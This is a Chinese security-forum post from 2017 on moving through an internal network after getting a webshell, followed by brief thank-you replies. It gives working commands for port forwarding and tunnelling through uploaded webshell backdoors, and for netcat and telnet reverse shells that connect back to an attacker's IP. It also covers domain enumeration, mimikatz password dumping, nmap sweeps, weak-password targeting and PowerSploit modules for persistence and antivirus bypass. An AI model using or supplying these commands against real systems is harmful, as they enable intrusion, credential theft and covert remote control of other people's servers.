看雪论坛
发新帖

[原创]内网渗透

红日俱乐部 2017-7-9 17:02 5357

当我们获取到一个webshell的时候,发现外网ip无法链接,但3389开放,那很有可能是内网服务器,下面我们将介绍几款有关内网转发的工具。

内网转发的工具

1、Lcx.exe工具使用

首先远程目标系统要开启远程访问功能(若未开可通过开3389命令开启).

lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。

首先在本地进行监听,监听51端口并转发到33891端口

lcx.exe -listen 51 33891

在webshell中运行

lcx.exe -slave 192.168.1.100 51 192.168.80.139 3389


远程桌面访问33891端口

使用创建的用户名密码登录服务器

2、Reduh内网反弹

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本地要安装jdk。
这里我们以php网站为例,首先将php文件上传到服务器端。

浏览器中访问上传的webshell,提示以下内容说明解析成功

用客户端连接服务端

java -jar reDuhClient.jar http://192.168.80.139/zvuldrill/reDuh.php

本地连接1010端口

nc.exe -vv localhost 1010
[createTunnel]1235:127.0.0.1:3389

远程登录

3、Tunna内网反弹

以下为后门文件,该工具是Python所写,需要Python环境,同样有jsp、aspx、php版本的webshell

这里使用php网站进行测试,上传php后门

python proxy.py -u http://192.168.80.139/zvuldrill/conn.php -l 1234 -r 3389 -v –s

远程连接

4、Linux系统通过nc反弹shell

首先,攻击端进行监听

nc.exe -lvnp 2333


服务器端执行

mknod /tmp/backpipe p


/bin/sh 0</tmp/backpipe | nc 192.168.1.101 2333 1>/tmp/backpipe

Ip为攻击端ip

执行命令,查看发现反弹成功

5、内置命令反弹

nc.exe -lvnp 2333

服务器端执行

mknod /tmp/backpipe p


telnet 192.168.1.101 2333 0<backpipe | /bin/bash 1>backpipe


反弹成功

获取更多服务器

上面讲了我们如何进入进入一台内网系统,既然我们已经获得了一台内网服务,那么我们如何获取更多服务器呢

我们可能会想到目标系统是什么,安装了哪些应用,可能存在的漏洞等等。
同样,我们需要收集信息,来帮助更好的入侵其他主机,下面是一些常用的cmd命令,还有很多可自行学习

net user                               ------ 本机用户列表 
net localhroup administrators          ------ 本机管理员[通常含有域用户] 
net user /domain                       ------ 查询域用户 
net group /domain                      ------ 查询域里面的工作组
net group "domain admins" /domain      ------ 查询域管理员用户组 
net localgroup administrators /domain  ------ 登录本机的域管理员
net time /domain                       ------ 判断主域,主域服务器都做时间服务器 
net config workstation                 ------ 当前登录域

密码获取

既然已经拿下服务器,那么我们就要获得服务器的密码,windows可以使用mimikatz获取用户名及密码,因为很有可能管理员将其他系统设置成相同的用户名密码。所以在其他内网系统可能同样适用。

可以看到既有hash值,也有明文用户名密码。

主机探测

既然已经在一个内网,我们首先应该想到的就是探测有什么服务器,有哪些开放端口等等,可以使用nmap,扫描C段,看看有多少台在线服务器。

扫描存活主机,既然是扫描存活主机,那么当然越快越好(个人喜好)

nmap -PE -sn -T4 192.168.80.1/24


我们已经知道那些ip是存活主机,那么就可以进一步获取各个系统的开放端口

nmap -sS -sV -O -p0-65535 192.168.80.145


可以看到开放的端口以及服务等服务器信息

同样,在内网也会存在很多不打系统补丁的情况,类似这次“WannaCry”虽然补丁已经出现一段时间,各大安全公司也好,各个安全部门也好都会提前预警打补丁,但是呢,你懂的,所以说,对某些不需要使用的端口及服务,直接停掉,以免临时抱佛脚,伤不起啊……
如果有系统漏洞,那么我们就可以使用matesploit进行溢出攻击等等

弱口令

同样,弱口令也是内网拿服务器的手段,说到弱口令就不得不说1433的mssql,3306的mysql,1521的Oracle,10050 的zabbix,7001的weblogic,8080的tomcat等等,都会存在弱口令的情况,但也存在被修改的情况,不过管理员嘛都是怕麻烦,会存在各种规律以免自己忘记,甚至有些管理员直接将某些账号密码写到某个文件夹中,这看你喽……

嗅探

也可以使用嗅探方法,如Cain,可以探测本地程序缓存的密码,通过嗅探器可以嗅探到相邻机器的username和password.。

powershell & PowerSploit

powershell

powershell基础学习,如果想了解powershell渗透测试原理,需要进行简单脚本开发。推荐网址:http://www.pstips.net/powershell-executing-external-commands.html


基础部分就不给大家在细介绍,大家可以根据提供网址进行学习。

Powershell的优秀之处

1. 代码运行在内存中可以不去接触磁盘
2. 从另一个系统中下载代码并执行
3. 很多安全产品并不能监测到powershell的活动
4. cmd.exe通常被阻止运行,但是powershell不会。

本次主要是简单介绍下powersploit,后续会出一套关于powershell系列课程。

PowerSploit

PowerSploit是GitHub上面的一个安全项目,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。

项目地址:https://github.com/PowerShellMafia/PowerSploit

代码执行(CodeExecution)

  • Invoke-DllInjection

  • Invoke-ReflectivePEInjection

  • Invoke-Shellcode

  • Invoke-WmiCommand

脚本修改(ScriptModification)

  • Out-EncodedCommand

  • Out-CompressedDll

  • Out-EncryptedScript

  • Remove-Comments

权限维持(Persistence)

  • New-UserPersistenceOption

  • New-ElevatedPersistenceOption

  • Add-Persistence

  • Install-SSP

  • Get-SecurityPackages

绕过杀毒软件(AntivirusBypass)

  • Find-AVSignature

信息收集(Exfiltration)

  • 这个文件夹主要是收集目标主机上的信息。

信息侦察(Recon)

  • 这个文件夹主要是以目标主机为跳板进行内网主机侦察。

由于公众号长度不可控,下节会接着讲powershell系列,利用powershell进行内网渗透、密码嗅探、端口扫描等操作。


本主题帖已收到 0 次赞赏,累计¥0.00
最新回复 (11)
wyfe 2017-7-9 19:53
2
学习一下
shenpengz 2017-7-9 22:12
3
谢谢分享
sun薇 2017-7-10 11:47
4
有能给我普及一下大牛胡一刀的么
编程人生 2017-7-16 22:59
5
内网渗透涉及到的不只是几个弱口令,或者几个端口发弹
黑色许逸 2017-7-27 19:12
6
谢谢分享,来学习
万信 2017-8-8 10:24
7
此楼层已删除
wx_你别笑 2017-8-11 16:54
8
有高手么?求认识
anhuiyuhu 2017-8-14 23:37
9
学习
zoonctrl 2017-8-15 16:41
10
看看还是可以的
墨影 2017-8-16 11:15
11
学习一下
elapseyear 2017-8-23 06:35
12
不错
刺豚 2017-8-23 23:11
13
学习了
返回



©2000-2017 看雪学院 | Based on Xiuno BBS | 域名 加速乐 保护 | SSL证书 又拍云 提供 | 微信公众号:ikanxue
Time: 0.015, SQL: 13 / 京ICP备10040895号-17